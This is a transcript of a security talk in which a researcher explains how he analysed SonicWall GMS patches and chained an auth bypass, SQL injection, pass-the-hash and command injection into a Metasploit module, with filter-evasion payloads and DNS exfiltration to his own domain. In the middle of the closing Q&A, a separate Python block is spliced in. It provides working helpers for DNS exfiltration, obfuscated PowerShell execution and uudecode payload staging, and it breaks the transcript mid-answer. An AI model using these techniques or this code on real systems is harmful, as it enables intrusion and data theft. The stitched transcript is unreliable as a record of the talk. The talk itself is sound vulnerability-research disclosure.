
Yeah, welcome to my talk, and thanks for coming. I'll do a quick introduction of who I am, then I'll talk about what the talk's about, and then I'll give the talk. My name is Ron. I work at Rapid7. I have a blog, skullsecurity.org, where I write all my CTF writeups and tips on reverse engineering and exploit development and stuff like that, sort of the stuff that doesn't fit in with our work blog, and then there are my various social links. I work at Rapid7, I'm a lead security researcher, I run the CTF at BSides San Francisco (I don't think my co-organizers are here, so I can say I run it, but really [inaudible] does; he's giving a talk downstairs right now), and I organize The Long Con, which is Winnipeg's conference. We run that every second year, usually; this is one of the on years, so we're just in the process of organizing that right now. I also have two pet birds, and sometimes I put them on lots of slides, but this time they're just on this slide. The one on the left is Clang, like the compiler, and the one on the right is Sharp, like C#, because they're green-cheek conures: GCC.

So this talk is about vulnerability research. As I said, I'm a lead researcher at Rapid7, and a lot of what I do is kind of twofold. Part of it is taking n-days (this is a vendor advisory) and saying, what does this mean to us and to our customers and to the community, and writing about it. The other half is finding 0-days and disclosing our own things, which this is not about. So this is going to be about: SonicWall posted an advisory saying there are 15 different CVEs in their GMS software. What do we do? It's our process of how we read the advisory, what we think about, what we look for, how we get the patch, how we analyze the patch, how we understand and contextualize the vulnerabilities, and eventually how we write an exploit for it, which goes in Metasploit, and it currently is a Metasploit module.

So what is vuln research? This is a quick intro, kind of boring work stuff, but my team does emergent threats. Emergent as in emergency: things that we think are bad, like a Citrix vulnerability or Outlook or various things like that that we think are going to be exploited in the wild, basically network edge devices. The big one this year is obviously managed file transfer, MFT, stuff. I've disclosed I think three different sets of vulnerabilities in
different managed file transfer stuff, so it's kind of been a big deal to us this year especially, and we try to help our customers and also non-customers; everything I do winds up public. We help people understand: is this an emergency, is this hype, should you patch, should you take things offline, what's the deal with this vulnerability? So when a bad vuln comes out we do three things (if my boss saw this she should probably correct me and say there's a lot more to the process), but we try to get a blog out quickly, within a few hours, saying here's what's going on, here's what we know from the advisory, from the PoC that's published, from whatever sources we have, quickly. And then we, which means me and my co-worker Stephen, will get a patch or test a PoC or dig into what the vulnerability means: is this an auth bypass, is this an overflow, can we reproduce it, are there caveats? There was one in Juniper a couple of weeks ago where an exploit got published, but when you exploit it you end up in a sandbox, a BSD sandbox, which is less exciting, and nobody really mentioned that. So things like that, caveats to the exploitation, are what we want to talk about. So in this case we'll talk about basically this whole process for the SonicWall vulnerabilities, which, again, we didn't find; this was published and we just went by the public report.

It varies from... (my watch buzzes, I should not have this on; I know Jeff will text me immediately if he knows that). Every project's a little bit different. We often have a vendor advisory saying please install this patch; we often have CVEs saying this is an auth bypass or this is such and such; and we sometimes have old and new versions of the software. This time we do, and we really want that. Sometimes a researcher publishes a blog, so one of our competitors or some independent person will publish a blog saying hey, we hacked this and here's how, and that's often a very good starting point for us rather than diffing patches. Sometimes you get detailed descriptions; sometimes the vendor advisory will call out that this endpoint is vulnerable, and that narrows things down a lot. They didn't this time. And sometimes there's a proof of concept; some people post something on GitHub, which we look at. We don't necessarily run untrusted exploits from GitHub, for reasons I'm sure you're familiar with, but we'll use that, especially if it's somebody reputable that we know; we'll use those as a basis and write about it, and we always give credit. All
of our stuff is very community focused, on my team at least.

So this is the actual advisory, and I know the text is kind of small, and it's not a huge deal what it all says, but I made a little slide where I did an animation and show the things that mean something to us. The first line, "SonicWall proactively works to blah blah blah", that's just lawyer talk, but what I think is interesting is: the software is GMS and Analytics. It was found by NCC Group; it was found by researchers, as far as I know during a pentest, but I don't know that for sure. It was disclosed to them as a coordinated vulnerability disclosure, so it was not exploited in the wild initially that we're aware of. They said it's critical, which is important to us. They have a PSIRT, which is good; a lot of the vendors we work with just have a guy who takes vulnerabilities and fixes them. This is all the kind of detail that we want, and this is what goes into the blog that we write: what can we extrapolate from this, and is something wrong? Here's the list of CVEs specifically. It doesn't really matter which one's which; we'll get to them as we go, but the four I put in bold are the four we ended up using to write this exploit. What's interesting is I ordered these by CVSS score: SQL injection was 9.8, that's important; the auth bypass was 9.4, that was important; but the command injection, which I think is the most important one, is 8.8 because it's post-authenticated, and it turns out when you have an auth bypass, post-auth stuff works well. And then the very last one, the lowest one, pass-the-hash, was actually a key component of our exploit. So it's a nice way to show that the high CVSS aren't always the high-risk things. I'm sure the others are important as well; we didn't necessarily find the others, but we'll see some of them.

Often the hardest part of these projects is actually getting the software, and I actually want to thank SonicWall for having free downloads for their stuff. Many companies put this behind a paywall or only allow customers or whatever, in which case it's much harder to do this stuff, but SonicWall was nice: they let us download the software for free, and also older versions, which was phenomenally nice. I promised to put some of the worst shenanigans onto a slide, and this is it. So basically we published a blog (my boss, Caitlin, wrote this), and we
published this, I don't know, a few hours after we started looking at it. So this is the basic information. We called out the four vulns that we thought were the most important, which turns out they weren't, but, like, what do we know? And we say here's what we think is going to happen, and stuff. As far as I know this was never really exploited in the wild meaningfully, so we predicted this would be exploited and it wasn't; you never know.

So we're going to look at the patch, because I think that's the most interesting part: what did they fix and how did they fix it. And I should say, it was on a slide earlier, I forgot to mention that I'm going to put a link to these slides at the end. I have lots of tiny little links at the bottom of slides to show where to get things or where to get more information; don't worry about writing them down or anything, I will post the slides after.

So this is a little montage of installing the software. Basically what I want to get across is that I installed two versions. The top row is my VMware Fusion: I installed Windows pre-patch, Windows post-patch, Linux pre-patch, Linux post-patch. What's interesting is the Linux ones come as a service, so an exe file that you install, and the next one comes as an appliance with a login screen, and I actually never figured out how to log into it. I never actually got past the login screen. I got a shell on it, but that's different. I'm sure I could have sped things up if I could log in, but whatever. Also I had to post a screenshot where it says "firewall, antivirus: please turn off your firewall and antivirus". I love that software still does that.

So I install the software. I run the software on Windows because I can access the OS, and I say, what port's listening? And it says Tomcat, and I go, huh, Java, so I guess we're doing Java stuff. Everyone: surprise. So I get the files, I copy them from there to there. I don't know why I made these slides, I just like slides. So I grab all the jar files. I realized this room is really big and there's a lot of small text, so I actually have another window where I have a lot of stuff in my browser or in my terminal, so I'll probably flip back and forth. But basically, somebody once told me they like seeing this exact command because it shows how I do stuff. So to reverse a Java project I start by grabbing all the .jar files, and there's usually hundreds; I think in this case there are 222 of them, and lots of
them are libraries, and lots of them aren't stuff that we care about, but if you want to actually understand how software works you often need the libraries, because you'll see an encryption routine, you'll look for it and then go, oh, that's a library from Apache or something. So I just grab everything: I use this find command to grab everything called *.jar and stick it all in one folder, and then I go, oh, there's a lot of these. So then I use a tool called CFR. There are lots of Java decompilation tools; Java is great for decompiling unless it's obfuscated, which this wasn't, thankfully. JetBrains makes something that people use, Jet-something, whatever; there's JADX, which is a great GUI tool. I like CFR, it's simple, I can use the command-line tool, I can just run cfr *.jar with an output directory and it just works. I want the output from that, and that's where I have this monitor. I'm missing a right key on my keyboard because my bird ate it, so I'm working without it. But you get this huge list of files, and what's the best way to do it? find, yeah. I knew, I read this before. But you just get an enormous amount of files, just tons and tons and tons and tons of files, and the interesting stuff is going to be under something probably called the product name, which is SonicWall, so you'll see even under SonicWall there's... (I pressed the wrong button because I'm missing a key) yeah, you see a lot of stuff. So that's our starting point.

So I do this for both the patched and the unpatched version, and then I use diff. I'm sure there are lots of tools for diffing code for vulnerability assessment; I just use diff on the command line, it's easy. 18,000 lines of diff; that's a lot of diff. I have the file open right here, go to the top; yeah, this is what the file looks like, and it's just pages and pages and pages and pages of diffs. Some of these are important, some of them aren't; we'll look through some of these. I don't want to spend too much time showing code because it's kind of boring, but I think it's also the important part. So let's see, I wrote down the line numbers for things. All right, so I'm just going to go through this and hopefully this is somewhat readable, and kind of scroll through a bit. So this is what I ended up with: okay, here's a big diff of all the changes; what stands out to me? So scroll a little bit,
scroll a little bit, and pretty quickly you're going to see "Tomcat manager password = c6cc...". I didn't even call that out on my slides because I think I talk about that later. They added two-factor, so a lot of the code they added is two-factor auth stuff; that's things we can ignore. The next thing we see is another hardcoded password: they changed from "2d26..." to the PG admin password. Presumably they changed from a hardcoded password to a configured password, and "2d26..." looks like an encrypted string, and if you scroll down a little bit (I'm not sure if it's in this) there's a thing that decrypts the string. So I did that myself: I made a tool called Decrypt.java, and I couldn't actually get it to work in my own Ruby code or whatever, so I just copied their code out of the decompiler. I just copied their code; this is just theirs, I just added the main function, but it's basically just the code from SonicWall. Back to the slideshow, still loads, good. And yeah, the password decrypts to GMSADM#1, and honestly this is a Postgres password, but Postgres isn't actually running; I assume it's for some module or something. This ended up being a really boring vulnerability, so I moved on.

So if I can get to line 239 (I know if I just scroll I'll probably find it, but I wrote down things), at 239 we see "cmd ... + regex". That sure looks like command injection, and it is, so that's probably the command injection CVE, post-authenticated command injection. What's important, and I'm not sure if I can actually see it in this, is that it's in an endpoint; it's in /appliance, and /appliance is going to matter later. So okay, that's shell injection. What else is there? Scroll, scroll, wrong button, still, scroll, scroll, scroll more, to the face, scroll, scroll, looking for line 418. 418: you see "18-character private key = bl...". It's 18 characters; not so private. So this is CVE-2023-34123, predictable password reset key. As far as I can tell this one's not super interesting, because it only works if the box is unregistered, so if it's brand new. So it's kind of cool they fixed it, but not that exciting. And we scroll some more; this is line seven-something, scroll, scroll, scroll, where is it, 759, went too far, 729: we see something called "directoryTraversalCheck = blah blah blah", so directory traversal stuff; that's probably CVE-2023-34125, post-auth directory traversal. And this goes on and on. I did this for two hours and copied everything that looked interesting. I think I have one more in my notes,
which is 1603; let's jump ahead to 1603. A SQL query went from concatenating strings to parameterized strings: SQL injection. So I went through and found dozens of instances of SQL injection, hardcoded keys, all these things. It was just too much, too many vulns for me, which I've never said. And even at this point we're at 13%; we have a long way to go if we want to do it this way. Wrong button. So we found post-auth command injection; that's probably what's going to get us a shell. So let's focus on that and see how we get from nothing to post-auth command injection. Several other vulns were called auth bypass vulns; sounds good. So I put together a plan, and this plan is going to get more complicated as we go, because it only gets more complicated as we go.

So going back to the diff (I know where to find this from doing it), if we search from the bottom for the word "auth", we see getAuthKey with what looks like a secret. I guess secret is the wrong word, but what looks like a string of characters that are kind of random, but they held shift and pressed buttons on their number pad. So the question is, where is this used? It's used in a file called MSWAuthenticator in a function called authenticate. So the authenticate function takes a username, a domain name, and a hash, and we'll see where those come from, and then this line here calls getAuthKey with the domain name, which I'll tell you is user controlled, and then this next parameter is a private key, which is not private; it's up here. And that calls this function getAuthKey, which does HMAC-SHA1. I can do HMAC-SHA1 with that key. So I did (if you ever want to look at these slides again, I screenshotted all these things, but it's a little bit bigger if I do it live, so I'm just doing that), yeah, so I did the same thing in Ruby. So I made an HMAC-SHA1, I use a domain name, or domain ID, whatever they call it, "hello", and then Base64 it (that's another thing that was in here, Base64), and then say here's my token, it's "6UI...". So we'll come back to that in a minute. Next, how is that used? That is used in a function called TenantMSWAuthenticator.authenticate, and what we want to do is figure out how to do this ourselves. So we have something called user2, which is from a thing called paramMap, which sounds like something the user can set; it is. And
then there's tenantId, which comes from the URL. If we go to the very top of this we'll see the tenant ID comes from the URL, mswTenantId. So let's figure out where it was. So tenant ID and username we get from parameters, and then authenticate, there it is, and then hash is also from that param map. So we have three things we control going into an auth function, plus a private key that we also control, so chances are high that we can actually bypass this auth and make our own token. And then it calls something called getDomainInfoByTenantSerial, which we will come back to: teased. So I generated a key for this "hello" domain name and then used that: /hello as the domain, user "system" (there are a couple of valid users), hash is invalid, and we get the error "authentication failed due to invalid parameters". If we look at this we will see that that's one of the error conditions we might get. So good, we found how to make this fail. So if we make this succeed using the hash we generated, we see "tenant ID is not valid", and sure enough the next error is "tenant ID is not valid". So good, we can make this check pass; we can bypass auth on something called MSW, which I don't know what that is, but it's not useful. So I bypassed auth on the web services endpoint that can do a few things that don't matter. It's like, okay, that was a waste of time, but not really.

This is really small, but there is another CVE, hardcoded Tomcat credentials, that we saw at the very beginning of the thing, which lets us view localhost/server-service-something, I didn't write it down, manager, localhost/manager; it only works on localhost and only works with the hardcoded creds. Barely matters; they fixed this, it's a CVE. But what I found out on this was there are four different endpoints: /appliance, /manager, /sgms (can't read this), and /ws. We bypassed auth on /ws, websockets, web services, something. What we actually want is /appliance; /appliance is where the shell injection was. So, well, we're in the wrong place. On these different services, as far as Tomcat's concerned, these are entirely different services: different cookies, different logins, different auth, different everything. What they do share is a database, and one of the things we talked about was SQL injection. So let's find SQL injection. This was a little bit hard because they fixed every SQL query in the entire software stack; they switched to parameterized queries, which is great, that's what they should do, but it also means I'm not sure which ones are actually accessible by us; they didn't just fix the ones that attackers can use. So, I teased earlier (oops, I'll
learn the right button eventually, I swear) the getDomainInfoByTenantSerial function; let's look at that. Here's a concatenation: "select * from table where serial = " .append(tenantSerial), which I control. All right, SQL injection; that was easy. So yeah, a pretty typical SQL injection query, and, to be pedantic, this is an authenticated SQL injection because we use the auth bypass. There are almost certainly ways to do this without the auth bypass; I didn't find them, so this is what we used in our exploit. So we can use that SQL injection to pull out anything from the database, including passwords. So I made a query that selects id concatenated with password from users where isRemain = 1, and then I get the username admin and the password "5f4d...", which nerds here might recognize. I put that into the most advanced password-cracking tool I have, Google (thank you), and that's the MD5 for "password". Cool. And, to be fair, that's my password; I used that password to create the hash, that's not their fault, that's mine. It's also a default password, but they make you change it; I just changed it back to "password" because I didn't want to remember something. So we have a username and we have an admin password hash. We can crack a hash, but if they used a decent password, unlike me, it's going to be hard to crack the hash, or at least it's not going to be easy to crack the hash necessarily. It's raw MD5, which is about as easy as it gets, but it's still not trivial; I don't want to have to crack hashes in a Metasploit module.

So what do I do? Well, another vulnerability released was called "client-side hashing function allows pass-the-hash". That sounds good. What's pass-the-hash? Anyone who does Windows stuff will recognize this as a famously famous thing on Windows. Basically, pass-the-hash lets you authenticate with a hash rather than with the password, so if you know the hash you can authenticate. We have a hash. Cool. Let's see if we can find the pass-the-hash thing. This is where I stopped looking at the diff, because the diff was too long and I didn't really know what to look for, and I just logged into /appliance using my username and password. So I logged in as admin; this is output from Burp Suite. The username is somewhere, or not; oh yeah, appliance user = admin. So I'm logging in as admin, and it has password = 5f4dcc..., that's the MD5, and that's actually ignored; it doesn't actually use that field at all, and I think it's supposed to be censoring the field and it's not, which is a different story. And then you see clientHash = bd3a... at the bottom there.
That's the hash that's actually validated; if I intercept this in Burp Suite and change that, the login fails, so I knew from that that that was the actual thing used for logins. So what happened? Where does that value come from? And I should say, if I changed the password hash, the 5f4d stuff, nothing changed; it still worked, so it's clear that wasn't being used. So this is JavaScript code now; we're going from Java to JavaScript. This is what runs in the browser, so you'll see a thing called clientHash: clientHash.value = getPasswordHash(document.login.password.value, ...), which is the value you typed in, so that's the word "password", and it passes a number; in this one it's 6066094..., and that changes every reload, and that is apparently stored in your session, because if you use the wrong one it fails. So that's going to be like a seed value or something, just like NTLM on the network does that sort of thing. And then the actual getPasswordHash function basically takes the passphrase, which is the word "password", and the random number, which I think is supposed to be a random number; it takes those two parameters and it just calculates the MD5 of the passphrase, which we know is the value we just stole from the database, like three slides ago, four, five, whatever, lots of slides ago. And then it sets the internal page hash to the MD5 of the random number, which is the 6066 value, concatenated with the MD5 of the passphrase. So we can calculate the internal page hash there without ever knowing the password; all we need is the hash to calculate that. And that is CVE-2023-34132, client-side hashing. So that means that if we get the password hash from the database, we can now use that to log in to the /appliance thing. Getting close; this is what we're looking for. And I should mention too, this is days of work; this has me chasing down false leads, all these different things. So I put the pass-the-hash in the Ruby. All this code is available, there are links somewhere, but this is all just from this exploit, shell-injection.rb, so if you ever want to see this actual code all at once it's available. Back to the slideshow. Yeah, so we can use pass-the-hash and authenticate.

So now this is where I'm really sad: my friend David, he's presenting downstairs right now in the workshops, because this is the thing he made fun of me for way in the past when we worked together. But there's this function, so this is on the path to the shell command injection that we saw, from the web handler; basically what it does is, if ApplianceUtil
.isWindows, print "this operation is not supported on Windows" and then redirect you to failure.asp. What it doesn't do is stop executing, so all the code below does run. It redirects the browser, but the code runs. I missed this; I've missed this like 10 different times on different things, and David has made fun of me for it every single time, and I've written a CTF challenge that could be bypassed with this vulnerability because I keep on bringing it. It's like my blind spot: I can't see "forgets to return", and that's not a super common vuln type really, but in any case it's just a little aside that there's an error check that doesn't actually do anything.

So that brings us to the shell injection. I think I've opened this one too. So basically the shell command injection we saw in the diff earlier, but this is the actual function with the command injection. If you trace backwards you can get the path from the web servlet handler thing to this pretty cleanly; it's just a bunch of function calls that are pretty obvious, so once you bypass auth there's nothing terribly difficult getting this extra step. But you'll see what's funny is they have isWindows, so they handle Windows even though they say it doesn't work on Windows, so I'm not really sure what's going on there. But they basically do a few checks, like is the search folder valid and stuff like that, and then they just concatenate your command with "cmd /..." whatever or "bash ..." whatever. So basically on Linux and Windows you can both inject commands, in different ways. And then, yeah, not too much to say on that; it's a pretty typical shell injection, you can use pipes or semicolons or ampersands or whatever to just inject your own command. And this is kind of what the exploit looks like, and this is sort of the endpoint of the easy part of the exploit, or the direct part; things get a little complicated afterwards. And you can see the Windows and Linux versions are pretty much the same except for a path, and unfortunately the path has to be
right, otherwise it will complain and not run, which is unfortunate. But yeah, this is CVE-2023-34127, post-auth command injection. So are we done? I can run notepad; we're basically done. It's not true, but: we can create a token. I think I have a summary here. Yeah, so we can use an auth bypass to forge ourselves a token, we can use that token to use SQL injection to get a password hash, use the password hash to authenticate to the /appliance endpoint, ignore the Windows error, and then shell command injection, run code, and we can run notepad, if you can see at the bottom there. So good. I thought we were done. We posted an AttackerKB write-up; this is one of the outputs my team does. This is tiny, but it's linked at the bottom, also tiny, but again, slides available. Yeah, we said we're done, we can run notepad, happy happy.

Then I went to write a Metasploit module, and that's where it got complicated again: the server has very aggressive filtering on those things. notepad.exe turns out to be fine, and in fact "| notepad.exe" turned out to be fine. This isn't shell command filtering; this is cross-site scripting filtering and some other things, so we had to do well-formed HTML as well as command injection. So figuring out how to actually take this command injection and make a generic exploit where you can run anything with it was actually kind of a complicated process. So we'll talk about how we do this on Windows and on Linux. So our new goal: how do we run any command? Running notepad is cool, and seeing notepad run as SYSTEM is cool, but I mentioned at the beginning of this talk, a lot of times someone like me, a researcher, will get to a point, whether it's being in a sandbox, whether it's being behind a filter, being something, where they're like, this is really cool, we got this proof of concept to work, oh, but it can only run notepad. Great, I care about notepad. So we wanted to take this one step further and say, how would an attacker use this to do any command? So this took some fussing; this took different encoding schemes, different weird stuff, but eventually we figured it out on both platforms, and I'll show a couple of the paths we took, but ultimately how it actually worked. So this is my coworker Spencer; he's on the Metasploit team, he does really cool stuff, he wrote a really good exploit for a Citrix thing a month ago, fun to watch him actually do that kind of stuff. So my first attempt was Base64. PowerShell can run Base64 code pretty easily: powershell.exe -EncodedCommand <Base64 stuff>. That's the easiest thing to do. The problem is we can't use
a plus character. The plus character gets blocked by their cross-site scripting filter, and Base64 needs pluses; that's just part of the spec. So we thought, what if we do the URL-safe Base64? URL-safe Base64 replaces pluses with hyphens and slashes with, something, underscores (that might be backwards), and those are all allowed; we can use hyphens, underscores, and every letter. Works great. It's like, oh cool, that command works, we have a workable module. Until I realized there were no pluses or hyphens or underscores or anything in there. So after a day of trying to figure out how to make this into a Metasploit module, we realized that we just got lucky and there were no bad characters in there. So it turns out you can't use Base64. So here's what we did use. This worked; it's not pretty, but it worked. I think Jeff actually helped me with some of this, developing this PowerShell nonsense, but basically we just encode a series of integers, and those get decoded by PowerShell into, like, curl a file and run the file. Metasploit calls these fetch payloads, but basically download and run an EXE. Not the cleanest, but it kind of works. So that's the Metasploit module as it stands; this is how the Windows bypass works.

Then Linux. Surely Linux is easier; Linux has a more powerful shell, I would argue (Jeff might disagree); Linux has a richer command line, more utilities, scripting is simpler, there's no PowerShell. Linux was actually harder. If you remember, at the very beginning I said I don't have access to the box; I never got a login for it. That was part of the problem: I didn't have SSH access. I maybe could have gotten SSH access if I tried; I didn't. I'm sure I could have just grabbed the shadow file and changed it if I wanted to, but that's no fun. The suite of utilities is tiny; it's an appliance and it runs BusyBox, but the BusyBox they compiled only has the stuff that they need: there's no base64, no xxd, no perl, no Ruby. They have a Python install that doesn't work; maybe you can make it work, it might need a home directory, it didn't work, I don't know how to work Python. But it had almost nothing. It also had opaque error messages: I could run a command, but I couldn't see the output from it, so I don't know. And then you aren't allowed quotes: no single quotes, no double quotes, no dollar signs, no brackets, and no backticks; those are all forbidden. So how do you even analyze the box? How do you start exploring? So I'm faced with something like this, where I have command injection but I'm not sure how to exploit it.
First thing I think of is DNS. DNS always works. This is a bit of an aside, because this was the wrong solution, but it worked, kind of. So I did whoami and I piped it into that little thing there with the squiggly brackets and read blah blah; that just reads the output of the command into a variable on sh (this is also sh, not bash, which is another problem). It reads that variable into newtest and then pings newtest.skullsecurity.org. I could have done a whole talk on how this thing works, but skullsecurity.org is a domain that I own, and every request for that
domain goes to me. So therefore if somebody pings abc123.skullsecurity.org, I will see the DNS request for that and respond with an error, but I'll see that it happened. So on the bottom you can see the output from a tool I wrote called DNS logger, and if you ping the result of whoami plus .skullsecurity.org, it does a ping for root.skullsecurity.org, which tells me the output of whoami is root. So you might wonder what else I can do with DNS. Did you know you can do slashes in DNS? I didn't, because it crashes my tool. But I can do which ping, and then ping the output of which ping plus .skullsecurity.org, and I'll get a ping request for /bin/ping.skullsecurity.org. This is
going through DNS; whoever runs DNS is like, what, a slash? But it works, until it gets to my software, which crashes. Anyway, you can use which ping and see that ping is there. So I spent like a half day doing DNS shenanigans, and it was fun, but then I realized you can read log files off the machine. So I realized later I could just ls, pipe it into a log file, and then download the log file. So this is the way, actually. DNS was fun and I'm like, well, this'll make a good talk, but it doesn't, because that was not the right way. So that's the output of the ls
command, and I wrote a bunch of commands this way to kind of explore the system, figure out what I have access to, figure out what tools exist. I realized way later that this runs in Java, so I clearly have access to Java somewhere on the file system, but thankfully I didn't remember that and didn't have to write Java. Someone afterward was like, why didn't you use a Java shell? I'm like, oh. This output doesn't matter; this is all a big list of commands that are available, and basically I said, okay, which of these... there's bunzip, could that be used to stage something? There's grep, there's md5sum, there's make, and there's lots of stuff. And what I ended
up settling on was uuencode and uudecode. uuencode/uudecode is an old MIME-ish thing that is still base64, but base64 requires plus characters, and plus characters aren't allowed. But this is Linux; I can do this. So there's the payload. Yeah, so basically this runs bash; it makes a variable called plus that uses base64 of plus to set the plus variable, and you have to do a bunch of special formatting, like begin-base64 755 and equals equals equals equals nonsense; that's all part of uuencode's format. There might be better ways to do this; this is what worked for me. So
it basically uses uuencode to get a plus sign into a variable, and then another uuencode with the variable sort of embedded, to bypass that filter. And this works; this bypasses the filter. It basically writes to a file and then runs the file, just like Windows. It uses coproc, which I think I had never heard of until this project, to run it in the background so it doesn't hang the server, and then it removes the file. And Linux is cool because you can remove the file while it's running and it'll just keep running, because magic. Yeah, this ends up working. And this is getting kind of close to the
end. I think I might have had a schedule which I thought I'd be behind by now; let's see. So here's the Metasploit module I ended up writing. This is public; this is in the Metasploit repository now. It was actually handy: Windows and Linux had different titles, so I was able to distinguish which one's which based on the title, which was kind of cool. The secret key, which came from the file that we saw. Basically this is all metadata nonsense: being able to set the user, being able to set the directory, stuff like that. It's not terribly exciting stuff. There's a check function; the check function basically validates that the
software is running. There's no version check that I could find, so we just verify that the software is running or not running, the end. And then get password hash: this uses that SQL injection we saw. It's a UNION SELECT; we need the ID from the domain, so it selects the ID, that's just part of the query. These fields don't matter, and this is where we concatenate the username and password; we saw this earlier. And then we make a token. This is that other thing we saw, where we could forge a token using that secret, the not-so-secret secret key from earlier. And then yeah, we use that to get the username and password. That
all works; sanity checks, yeah. Basically we get the password here. Found an account. I can't actually run this because the server is not running on my laptop, but then using that token we authenticate. This is the thing we saw earlier: it grabs that hashing token from the page, uses pass-the-hash to create our own token, blah blah blah, and then eventually we execute either the Windows command (this is how we generate the PowerShell command from earlier) or the Linux command, which I have a big explanation of why I did this nonsense. But this is actually the Linux command before it's all escaped, so it's actually a lot prettier. You see it
sets the plus sign, it uses the plus sign as part of the encoding, blah. Yeah, this is what it does, and these both run quite stably; no real problems there. Anything else? No, that's the last of that. So yeah, on Windows we use integers, on Linux we use uuencode. What's really cool about both is you can encode any command you can imagine, so both of them can run any remote command. This is the output on Windows; I know it's tiny, it doesn't really matter, but that's what the Metasploit module looks like when it runs. This is what it looks like on Linux. And yeah, so this, all in all, was
a two-week project summarized in 38 minutes. Oops. For this project, like I said, we had a patch and an advisory and not much else. There have been times we've had a lot less; there have been times we've had a lot more. I guess since I'm early, I'll just mention my blog, skullsecurity.org/cv, if you're curious about the stuff I've done. Everything I've worked on at Rapid7 and otherwise is on here: links to all my analyses, vulnerabilities I discovered, vulnerabilities analyzed, lots of junk going back to my old StarCraft hacking days from 2009. Yeah, feel free to check that out. What's kind of cool is that while I was doing this, another company called Grey
Noise launched a tool called Sift, and the very first example in the tweet from the CEO and everything, I saw the GET... it's a GET request that looked like "seq jaction for WS msw1 Union", like, oh, that's my exploit. So I guess since this was released, people are actually scanning for it. So if you run something called GMS or Analytics, you should probably make sure you're patched. Yeah, this is my contact info. That QR code will lead you to the slides; that tinyurl at the bottom will lead you to the slides, probably. My email, Mastodon, Twitter (still up, it's an old joke), Bluesky. I have tons of stuff, so feel free to take a picture or use the QR code,
and yeah, we have time for questions. [Applause]

Yeah, everything in here is public. The slides are public, the exploit is public, the proof of concept is in my repo, which is... where is it? Here, at callic boom. My boss told me not to use the name of the actual product, so I make stupid names for my repos. But yeah, feel free to grab this. Awesome, thank you. [Laughter]

Another question: any secrets for finding old versions of software? So the question, for the stream (I haven't talked before, Jeff), is: how do you find old versions of software if the vendor doesn't publish them? It's hard.
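Added example (my code, not the Metasploit module, the speaker's repo, or anything shown on the slides): the three tricks the talk used against the blind, filtered command injection, each paired with a reference decoder so the encodings can be checked offline. Assumptions not taken from the talk: the hex-chunked `<tag><index>-<hex>` label scheme (the talk pinged the raw command output, which is why slashes broke the logger), the use of `skullsecurity.org` only as a stand-in for the speaker's own domain, the PowerShell `iex(-join [char[]](...))` stub, the sample commands, and the `linux_plan` helper, which only counts the pluses that the talk's second uudecode stage splices in from the recovered variable rather than reproducing that splice.

```python
"""Blind-injection helpers: DNS exfil of output, '+'-free PowerShell,
and uudecode's base64 mode for recovering '+'.  Added example, not the
talk's own code; stubs, label scheme and sample inputs are assumptions."""
import base64
import binascii
import re

# Characters the talk says were rejected: '+' by the XSS filter on both
# platforms; quotes, $, parentheses and backticks at the Linux injection point.
XSS_BAD = set("+")
LINUX_BAD = XSS_BAD | set("'\"$()`")

def bad_chars(payload: str, bad: set) -> set:
    """Forbidden characters present in a candidate payload (empty set = clean)."""
    return set(payload) & bad

# --- 1. Exfiltrating command output through DNS lookups ---------------------
MAX_LABEL = 63   # RFC 1035 limit per label

def dns_exfil_names(data: bytes, domain: str, tag: str = "x") -> list:
    """Hex-encode `data` and split it into one query name per label:
    <tag><4-digit index>-<hex>.<domain>.  Hex keeps each label to [0-9a-f],
    so '/' or newlines in the output never reach the resolver or the logger."""
    hexdata = binascii.hexlify(data).decode()
    chunk = (MAX_LABEL - (len(tag) + 5)) // 2 * 2      # even count of hex digits
    names = []
    for i in range(0, max(len(hexdata), 1), chunk):
        names.append(f"{tag}{i // chunk:04d}-{hexdata[i:i + chunk]}.{domain}")
    return names

def dns_exfil_reassemble(queries: list, domain: str, tag: str = "x") -> bytes:
    """Rebuild the output from observed query names, in any order, ignoring noise."""
    pat = re.compile(rf"^{re.escape(tag)}(\d{{4}})-([0-9a-f]*)\.{re.escape(domain)}\.?$")
    chunks = {}
    for q in queries:
        m = pat.match(q.lower())
        if m:
            chunks[int(m.group(1))] = m.group(2)
    return binascii.unhexlify("".join(chunks[i] for i in sorted(chunks)))

# --- 2. Windows: a '+'-free PowerShell command built from integers -----------
def ps_int_command(command: str) -> str:
    """Emit only digits, commas and a fixed stub (the stub is an assumption);
    PowerShell rebuilds the string from the code points and runs it."""
    ints = ",".join(str(ord(c)) for c in command)
    return f"powershell -nop -c iex(-join [char[]]({ints}))"

def ps_int_decode(wrapped: str) -> str:
    """Reference decoder: the command PowerShell would actually execute."""
    m = re.search(r"\[char\[\]\]\(([\d,]+)\)", wrapped)
    return "".join(chr(int(n)) for n in m.group(1).split(","))

# --- 3. Linux: uudecode's base64 mode yields '+' without typing one ----------
def uu_b64_document(data: bytes, name: str = "p", mode: str = "644") -> str:
    """Text in the form `uuencode -m` writes and `uudecode` reads."""
    body = base64.b64encode(data).decode()
    lines = [body[i:i + 60] for i in range(0, len(body), 60)] or [""]
    return "\n".join([f"begin-base64 {mode} {name}", *lines, "====", ""])

def uu_b64_decode(doc: str) -> bytes:
    """Reference decoder: header line, base64 lines, then the '====' terminator."""
    lines = doc.splitlines()
    if not lines or not lines[0].startswith("begin-base64 "):
        raise ValueError("not a uuencode base64 document")
    body = []
    for line in lines[1:]:
        if line == "====":
            break
        body.append(line)
    return base64.b64decode("".join(body))

PLUS_STAGE = uu_b64_document(b"+")   # base64 of '+' is 'Kw==': no '+' in it

def linux_plan(command: str) -> dict:
    """Stage 1 recovers '+' via uudecode; stage 2 is the real script's document.
    Reports how many '+' in stage 2 would have to come from that variable."""
    stage2 = uu_b64_document(command.encode(), name="s")
    return {"stage1": PLUS_STAGE, "stage2": stage2, "plus_needed": stage2.count("+")}
```

`bad_chars` is the check to run before sending anything: the URL-safe base64 attempt described in the talk only looked like it worked because the sample command happened to contain none of the rejected characters. `uu_b64_document` output can be fed to a real `uudecode -o /dev/stdout` on any box that has the utility, which is how the `Kw==` stage is verified.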
We have a directory on Google Drive at work called Vulnerable Software, which has... every time we work on anything, we put it there. So we have hundreds of gigs of old versions of software. Looking for FTP servers, like ftp.company.com, can work. URL hacking: so if you download, like, SonicWall GMS 1.2.3, try 1.2.2; that often works. Some vendors do give you access to their software. Googling things in front of a crowd, yeah: MySonicWall is a site for SonicWall, and they actually made it really easy, which I was very impressed at. Yeah, there's a button called Sign Up on their page. When you click Sign Up,
